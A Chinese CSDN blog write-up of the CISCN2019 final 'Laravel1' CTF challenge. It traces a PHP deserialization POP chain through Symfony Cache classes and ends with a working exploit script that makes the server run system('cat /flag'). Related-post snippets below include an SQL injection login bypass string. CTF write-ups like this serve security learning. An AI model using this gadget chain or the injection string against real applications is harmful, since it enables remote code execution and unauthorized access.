[CISCN2019 总决赛 Day1 Web4]Laravel1

最新推荐文章于 2023-03-06 18:56:30 发布
最新推荐文章于 2023-03-06 18:56:30 发布
阅读量790 收藏 1
点赞数 1
分类专栏: writeup 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fightte/article/details/117133606
版权

[CISCN2019 总决赛 Day1 Web4]Laravel1在这里插入图片描述

界面如上,比较单一:

指出了反序列化的点:还有备份文件。

下面反序列化的入口:
在这里插入图片描述就当找到了吧:
在这里插入图片描述确实可以跳转:
在这里插入图片描述可控:
在这里插入图片描述寻找这个类,看是否被调用:
在这里插入图片描述在这里插入图片描述
开始寻找使用了saveDeferred类的:

看别人的WP这个是唯一可以使用的:
在这里插入图片描述
调用了本类的initialise方法,但前文并没有定义,据其他WP说是会去父类找,

偷一张其继承关系的图:
在这里插入图片描述查询得到其主要父类,尝试全局搜索initialise()
在这里插入图片描述
include可以使用:
在这里插入图片描述那么在之前的那个PhpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来:

贴exp:

<?php

namespace Symfony\Component\Cache\Adapter;

class TagAwareAdapter{
    public $deferred = array();
    function __construct($x){
        $this->pool = $x;
    }
}

class ProxyAdapter{
    protected $setInnerItem = 'system';
}

namespace Symfony\Component\Cache;

class CacheItem{
    protected $innerItem = 'cat /flag';
}

$a = new \Symfony\Component\Cache\Adapter\TagAwareAdapter(new \Symfony\Component\Cache\Adapter\ProxyAdapter());
$a->deferred = array('aa'=>new \Symfony\Component\Cache\CacheItem);
echo urlencode(serialize($a));

使用:

还有问题未解决,等待了解:理解的太浅显了:
在这里插入图片描述

F1gh4
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
buu-[CISCN2019 总决赛 Day2 Web1]Easyweb
qaq517384的博客
10-10 226
扫!(或者靠经验先试) /robots.txt 看源码发现已知的php只有user.php/image.php/index.php 然后在image.php.bak里找到源码 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); $i
电子商务知识竞赛决赛(1).ppt
11-12
电子商务知识竞赛决赛(1).ppt
[CISCN2019 总决赛 Day1 Web4]Laravel1-PHP代码审计学习
cjdgg的博客
03-16 790
题目就是简单的几行代码,看到了反序列化函数,还提示了有源代码,那就说明得审代码找POP链咯 源码下了文件还挺多的,这会就有点懵逼了,文件这么多一个一个的找得找到猴年马月啊。 无奈之下上网翻一翻网上审Laravel的文章,发现了可以先全局搜索缩小范围(Sublimetext中是快捷键ctrl+shift+f),提高速率,我搜了下_destruct 找到了不少,双击就可以去到文件文件里面具体查看,接下来就是一个个去看有没有发现有用的吧 第一次审这么大的文件,东西太多太杂,没啥经验,没看出啥,只能找篇大佬的.
CISCN final 几道web题总结
weixin_30376453的博客
07-30 228
因为都有源码,所以这里直接从源码开始分析: 1.Easy web 这道题本来的意思应该是通过注入来load_file读取config.php来泄露cookie的加密密钥,从而伪造身份进行登陆再上传shell 这里本来addslashes以后就基本没法注入,但是这里却多了两行替换,所以能够继续注入, 这里config过滤可以使用16进制或者char编码绕过: ...
刷题(第二周)
qq_62046696的博客
03-06 534
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
4月24日全球总决赛需求更新1
08-04
在本次的"4月24日全球总决赛需求更新1"中,主要涉及到的是华为技术有限公司组织的某项比赛的决赛规则调整,特别是关于条件变更、交互协议和交互示例的更新。以下是这些知识点的详细说明: 1. **条件变更点**: - ...
数学花园探秘(迎春杯)总决赛2017.docx
10-11
2017年的迎春杯总决赛是数学爱好者们展示才华的重要舞台,其试题设计既考验了孩子们的基础数学知识,又强调了逻辑推理和问题解决能力。 首先,我们要理解迎春杯的性质。迎春杯数学竞赛是中国小学阶段的一项重要数学...
2019普译奖决赛征文 Academic Integrity Counts1
08-03
Academic Integrity CountsIn order to increase their popularity and for the sake
第五届发现杯大赛总决赛参赛指南1
08-04
【第五届发现杯大赛总决赛参赛指南】是中国电子商务协会、杭州市商务委员会和杭州经济技术开发区共同主办的一场大型赛事,旨在响应国家关于“互联网+”行动的指导意见,推动大学生创新创业教育。大赛以“发现人才、...
BUU CTF web(四)
0xdawn的博客
05-11 5180
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
我们的决赛
万码千钧
01-23 377
下午对阵研究生院,干掉他们便出线,就可以有更多锻炼队伍的机会,否则……暂且不考虑。 这是我们的决赛。我希望自己的体力争点气,正当或超常发挥,打进珍贵一球。加油!
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6792
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
CISCN2019 web writeup
stepone4ward的博客
04-25 1962
记录一下萌新的第一次CISCN之旅,这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高,接下来是我对这次比赛解题过程的记录~ web1 访问index.php,可以看到如下界面 右键查看页面源代码 得到了两个提示 1.index.php中可能存在有文件包含的漏洞 2.hint.php存在有提示 首先利用php://filter访问hint.php,修改url...
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_43940853的博客
03-17 1343
文件泄露 通过观察源代码(反正就是这几个php文件嘛,一个个试就行了) //image.php.bak <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=a...
BUU__Web 分类练习文档
风过江南乱的博客
08-18 958
前言 这是赵总总结分类的,我只是搬一下,保存一下,原链接 赵总博客 分类 1、代码审计以及反序列化 https://buuoj.cn/challenges#BUU%20CODE%20REVIEW%201 https://buuoj.cn/challenges#[HCTF%202018]WarmUp https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP https://buuoj.cn/
buuctf-web-[CISCN2019 华北赛区 Day1 Web1]Dropbox
weixin_43345082的博客
08-27 3285
在下载的时候可以通过抓包修改文件名filename=…/…/index.php 获得源码 有这样几个页面 重点在class.php和delete.php中 当时提示是phar反序列化 什么是phar反序列化 传送门1 传送门2 在phar://xx.phar文件的时候 可以通过某些函数触发反序列化 delete.php会执行$file->detele(); class.php中的File类...
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
[ciscn2019 总决赛 day2 web1]easyweb
最新发布
03-16
很高兴为您提供答案。 ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证。 例如,我们可以在用户名字段中输入: admin' or 1=1# 这将导致SQL查询返回所有用户的信息,因为1=1始终为真。 然后,我们可以在密码字段中输入任何值,因为它不会被使用。 这样,我们就可以成功登录并获得flag。 希望这可以帮助您解决这道题目。如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值